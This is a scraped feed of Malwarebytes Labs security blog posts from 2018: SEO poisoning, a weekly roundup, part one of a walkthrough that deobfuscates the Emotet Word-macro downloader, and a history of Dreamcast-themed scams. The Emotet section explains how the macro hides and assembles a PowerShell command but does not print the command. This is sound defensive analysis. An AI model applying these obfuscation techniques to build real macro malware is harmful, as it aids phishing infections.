Search engines want to serve you authoritative pages on the subject that you are looking for. One of the determining factors for the ranking in the search results is called the Page Authority. As you can see in the example below, the page authority is not just a matter of how many incoming links there are. And it is also not the only factor that determines your ranking in the search results. Even though the BBC site has more “page authority” on the keyword of “spyware,” the Page Authority calculation is based on many other factors and seems to take into account that detecting spyware is part of Malwarebytes’ core business.

Authority calculations and screenshot made with Moz Pro

So, a good method to be seen by the search engine’s algorithm as an authority in a certain field is to attract incoming links. And it is important that these links come from other authoritative sites in the field that your page aims to rank high for. Quality really outweighs quantity here. To accomplish this, you need a well-written and cleverly formatted (optimized) page that people will point to if they want someone to read an informative or explanatory piece.

When does link building become SEO poisoning?

If you are lazy, you can’t spend the money to hire someone, or it’s just plain hopeless to become an authority due to heavy competition in your field or for your keywords, you might consider buying incoming links from a black market vendor. These threat actors will usually have, or be able to obtain, a multitude of compromised sites that they can use to post links on. Another method that they may use is to spam forums with the help of spambots. So, we draw the line at whether the site owner agrees with the links being posted on his site.

Contrary to popular belief, posting links on social media like Facebook and Twitter does not help to improve a page’s SEO. The links on social media are “nofollow” links, and Google’s bots will not follow them or add them to your tally of incoming links. Google+ is an exception to this rule. I wonder why.

A quality link from an authoritative site weighs heavier than a lot of low quality links.

Pure malicious purpose

A recent example where SEO poisoning was used successfully is one where link building was done purely for malicious purposes—to infect visitors. By adding keywords and links in hacked websites, threat actors were able to get malicious pages ranked at the top of the Google search results for specific and carefully-chosen queries. The desired queries were banking and financial questions, and visitors of the ranked pages were infected with a banking Trojan.

Are all link building services bad?

No, that’s not what we are saying. But the services offered on black hat forums with a “no money back guarantee” should be examined with a 10-foot pole and a disinfected microscope. If you are not an SEO professional and SEO is just a by-product of trying to sell your goods or services, then by all means, contact a professional and see what they can do for you.

Just make sure you don’t end up sponsoring some malware author who goes around hacking legitimate sites and who may end up ruining your reputation. Because there are ways to investigate whether you have used black hat SEO techniques to boost your search rankings.

Is SEO poisoning actually recommended?

It is not recommended for several reasons:

  • It’s not effective. With Google’s new search engine algorithms, black hat SEO is far less effective than it used to be, but is still offered by malware actors on underground markets.
  • There are negative side effects. If Google or others sniff out your method, this might ruin page or domain authority, as well as professional reputation.
  • It doesn’t come cheap. In the long run, you may end up spending a lot of money—money much better spent on legitimate and long-standing methods for success, such as hiring an SEO professional on staff or working with a consultation on learning best practices.

Not to give you any ideas, but you can also buy negative link building services for your competitors. As appealing as it may sound to have your competitors’ product associated with the keyword Viagra, we do not recommend using these either.

The best long-term solution is to work hard and play fair using legitimate SEO tactics to boost your page rankings. If you aim for a cheap and easy way around SEO, you’ll get exactly what you paid for: a whole lot of nothing.

The post SEO poisoning: Is it worth it? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (May 21 – May 27)

Mon, 05/28/2018 - 20:26

Last week we told you about a Mac cryptominer using XMRig, an overview of Dreamcast related scams, part 1 of decoding Emotet, and what to do about bad coding habits that die hard.

We also published the results of our second CrackMe contest.

Other news News about the Russian “router botnet”

Stay safe, everyone!

The post A week in security (May 21 – May 27) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malware analysis: decoding Emotet, part 1

Fri, 05/25/2018 - 15:00

Emotet Banking Trojan malware has been around for quite some time now. As such, infosec researchers have made several attempts to develop tools to de-obfuscate and even decrypt the AES-encrypted code belonging to this malware.

The problem with these tools is that they target active versions of the malware. They run into problems when the authors of the malware change the code. The change could be anything from slight variations to the code structure to drastic changes such as moving from a VBA project to PowerShell scripting. Usually, even a minor code variation breaks the tools.

The main goal of this article is to help readers understand the structure and flow of Emotet in detail, so that code variations do not pose challenges to analysts who are trying to decode it in the future. We will also take a deep dive into some important parts of the code itself in order to understand the execution in a detailed, step-by-step process.

In the first part of this two-part analysis, we look at the VBA code, where you’ll learn how to recognize and discard “dead” code thrown in to complicate the analysis process. We also look at techniques that can be used to extract the obfuscated commands, and how the code executes.

Emotet overview

For the purpose of our analysis, we’re taking a look at this sample:

File: PAYMENT 225EWF.doc

MD5: e8e468710c0a4f0906305c435a761902

SHA-256: 707fedfeadbfa4248cfc6711b5a0b98e1684cd37a6e0544e9b7bde4b86096963

The current version of the Emotet downloader uses PowerShell to execute final commands. The infection vector is a traditional email phishing campaign. The phish would contain a link that the victim is supposed to click on, which in turn would start the download of the malware. The malware is usually a Word document, which prompts the victim to enable macros. Once the macros are enabled, the VBA executes in the background, and the payload is downloaded and executed on the victim’s computer.

VBA code

Let’s take a quick look at how we can access the VBA code from the infected Microsoft Word document. In order to enable the Developer view in Word, go to File and select “Options.” In Options, click on “Customize Ribbon.” Enable the “Developer” option and hit OK.

This should now get you a “Developer” item in the top menu bar. Once you click on “Developer,” you’ll see the option “Visual Basic.”

Click on Visual Basic and you’ll be presented with the entire project in a separate window. We can now start analyzing the code.

Alternatively, we can use an automated way of extracting this Powershell script by running the document in a VM and checking the parameters with which the Powershell was deployed, i.e. with the help of ProcessExplorer. Also, sandboxes such as Hybrid Analysis extract it automatically. 

Code execution

Once the “content” is enabled (macros), the execution starts.

The VBA code comes as part of the malicious MS Office document. As soon as the macros are enabled, the code executes in the background.

As an attempt at obfuscating the code, the developers have included a lot of text that is not used. Only part of the entire code is usable, and it is quite well hidden.

A faster way to get straight into the code is to start at the macro code that is called for execution of the initial commands. In the case of the sample analyzed here, it is the Sub AutoOpen(). We start by following this sub procedure.

We will now discard all the useless code that has been included in the sub to complicate analysis.

We can see at the end of the sub procedure, the method is called:

To execute the method shown above, we can see that the method calls on a sub and a function.

First, we take a look at sub ndUzTzJ.

This sub again has some useless text that is just there to add complexity for the purposes of analysis. We will focus on usable code only.

This is what the sub should look like after we’ve discarded the useless code:

vbHide will be assigned a value of 0, which means the window is hidden and focus is passed to the hidden window.

DsPBkKtzcIwF – generates the command.

ndUzTzJ – calls WScript.Shell to execute the command.

Let’s take a look at a section of the Function DsPBkKtzcIwF():

In the code snippet above, we can see a few notable things:

Variables are being used to store assigned values. The values will then be passed to a different function, yy222222222222222y(), for processing. Once processed, the values are then assigned to different variables again and these variables will be used to construct the encrypted code that will be passed onto the system for decryption using PowerShell.

Deep dive

Let’s take a deep dive here and closely analyze the code:

JMArl = “zahajUZomiAjVADEAMAA4ADMdpokrTZ”

Variable JMArl is assigned the value of “zahajUZomiAjVADEAMAA4ADMdpokrTZ”

szFqp = sRWNiPRldXLv = 21790 + 2115454 * PhcMjZjwl – CLng(8712932) / (zunFnTXk – Sqr(1328634 * Oct(7463260) – 1977628 – 4976151) * (294265 / XiFEWH))

vLkhkiRclJ = GcDcX = 3122978 + 1398811 * JTkURPW – CLng(9593915) / (krXPEiFIa – Sqr(1266549 * Oct(1775652) – 8314095 – 5625841) * (8872696 / mNsSkdPD))

This code is not usable—we will discard it.

sEVQo = IjKrpJC + yy222222222222222y(JMArl, 14, 11)

This is where most of the action takes place. The variable sEVQo is assigned the value of the output of “IjKrpJC + yy222222222222222y(JMArl, 14, 11)”

“IjKrpJC” doesnt serve any purpose, we will discard it.

yy222222222222222y() is the function being called. Let’s take a look at the function itself:

Now, let’s get rid of all the garbage code from the function and then have another look at it:

The function calls on the Mid function, which processes the data for further use.

Mid function


Now that we understand how the code flow has been structured, let’s take a look at how the program executes.

Here’s the variable sEVQo  before it has been assigned any value:

sEVQo now calls on yy222222222222222y(). We can see that the value “14” has been passed on to the function variable “twOYMDvfbGk”:

sEVQo = IjKrpJC + yy222222222222222y(JMArl, 14, 11)

Moving on, we can see the value “11” has been passed on to the function variable “VSTcawBYGW”:

sEVQo = IjKrpJC + yy222222222222222y(JMArl, 14, 11)

Finally, the text string will be passed on to the variable mbPRLWAjZ, which is EMPTY at first:

Now, this data will be processed using the Mid function, as described above.

Let’s take a look at how that unfolds:


twOYMDvfbGk= 14

VSTcawBYGW= 11

Mid(hPoMiTjfoDT, twOYMDvfbGk, VSTcawBYGW):

Mid(“zahajUZomiAjVADEAMAA4ADMdpokrTZ”, 14, 11)

It should translate to:


 Now let’s take a look at the function in execution again:

And it will be passed back to the calling variable:

And now the value for the variable sEVQo has been assigned to ADEAMAA4AD. That was a look at one of the many variables that were used in this function.

To see how it all flows into the end result for this value, we can take a look at the final assignment of the variable:

The value assigned to DsPBkKtzcIwF after the above line of code is executed is the command that will be executed by sub ndUzTzJ:

We can now print the output to screen (using MsgBox) to have a quick look or to the immediate window (using Debug.Print) for a complete result.

Here’s the part of the command from above that invokes PowerShell:

Which should translate (look at the highlighted text) to:

That was a look at how to get the final command with the encrypted data out of the VBA code. In part two of this series, we’ll decrypt this data to extract the stage two payload URLs from it.

The post Malware analysis: decoding Emotet, part 1 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Happy anniversary to Dreamcast…and its scams

Thu, 05/24/2018 - 15:00

This month marks 20 years since the legendary SEGA Dreamcast console was first announced. Looked on fondly by gamers, it revolutionised many aspects of gaming and brought cheap(ish) online console gaming to the masses.

Click to enlarge

SEGA has endured many, many calls for it to come back as Dreamcast 2. The games are widely demanded as retro remakes, and it’s never quite faded from public view. What you might not know is that it’s been the subject of a number of phishing scams/fakeouts down the years. Here are some of my favourites.

Ye olden days

In 2006, when dinosaurs ruled the Earth and televisions were black and white, the Dreamcast had been dead and buried for a few years already. But people still used them, modded them, and still went online with them. See, it came with a modem, and the idea was you went online via SegaNet or DreamArena to play online or just browse the web. You can still go online with them today, with a little bit of additional work.

And now, enter stage left: Shenmue.

Click to enlarge

Anyone interested in games these days is likely already aware Shenmue 1 and 2 are being remastered, and there’s even a Shenmue 3 on the way to help tie up the dangling story:

Back in the day, it seemed there was no chance of this ever happening despite endless requests, campaigns, fan networks, the lot. While pleas fell seemingly by the wayside, mischievous individuals were all too happy to fill the SEGA shaped vacuum.

Here’s the interesting bit: Shenmue came with a disc called the Shenmue Passport, which was a crude way of popping a web browser via the game and looking at game-related content. It came to pass, one fateful day, while retro gamers were loading up their Passport disc that they saw the following:

Normally it’d say “click to enlarge” under that image, but the screenshot is so old this is the kind of maximum resolution size we have to cope with. (Dinosaurs and black and white televisions, remember?)

It says:


The Shenmue Passport is in update process. Come again and visit us!

Downloads were suddenly available, with the promise of “more to come.” Everyone got excited, and some people even tried uploading their forklift truck racing times (long story).

Click to enlarge

Imagine their dismay when it turned out that someone had obtained the Shenmue(dot)com domain, and decided to play a prank. For a while, the Shenmue domain came back with all the various downloadables that you could no longer obtain through the game, but the addition of the “more to come” messaging made people believe this was the first step of the game returning in new forms. All I can say to that, is “Whoops.

Some forum threads about this still remain online, and you can see some of the fallout including attempts by SEGA to reclaim the URL.

Click to enlarge

It reads:

Finally I want to say sorry again to all (like I said sorry in the Shenmue BBS), but now I promise to don’t do something stupid again. And sorry for my bad english (still learning) and my poor Japanese (still learning too). If anyone reach to a SEGA person, tell to him to contact me at [redacted] and I’ll transfer the domain as the people of this forum told me. Sorry again. But don’t loose the hope in Shenmue…

Oh dear.

2007: Shenmue 3 is coming (not)

Would you like a fake Shenmue 3 announcement? Of course you would. That video now has had more than 1 million views (with some 800,000 of those landing at time of launch), and unfortunately, it’s yet another fakeout. Its creator simply took footage from the older games and mashed it up with promotional material from the abandoned Shenmue Online. Here’s the now obligatory thread of angry gamers.

2008: Sign-ups and affiliate codes

You know how someone grabbed the Shenmue domain? Well, lightning struck twice in 2008 when someone did much the same thing with the Dreamcast website. Here’s what it suddenly looked like:

Click to enlarge

“Do you still own a Dreamcast?”

Well, yes, several. Offering up the promise of a [yourname]ATdreamcast(dot)com email address, it sent the fans wild. Handing the new portal your console serial number(s), username, password, and a current email address would land you a seemingly valid yourserialnumber@user(dot)dreamcast(dot)com address. In practice, this meant the scammer ended up with a large list of emails to target with spam, and also—if people had reused passwords from their actual email for their “Dreamcast” mail—logins. My favourite thing about this was the video game website affiliate code ad hidden in the page:

Click to enlarge

2009: A grab bag of pranks

If you’re thinking this console has had a lot of scams hung around it, you’d be right. Step forward, 10th anniversary of said console filled with yet more shenanigans. These are most of the major Dreamcast-themed antics down the years, but there’s lots of others, like the photoshopped Shenmue 3 disc, or the edited “Shenmue 3: Believe” text from a magazine preview, which sent people into a frenzy.

Back to the future present

Now that Shenmue 3 is actually on the way, it’s likely that we’ll see some fresh new scams as the launch draws closer. You just can’t keep a good console—or a smart scam—down. Having said that, you don’t need to go digging around in the depths of retro gaming to find a scam. Your modern games and devices are often more than enough to keep scammers and other cybercriminals busy.

The post Happy anniversary to Dreamcast…and its scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds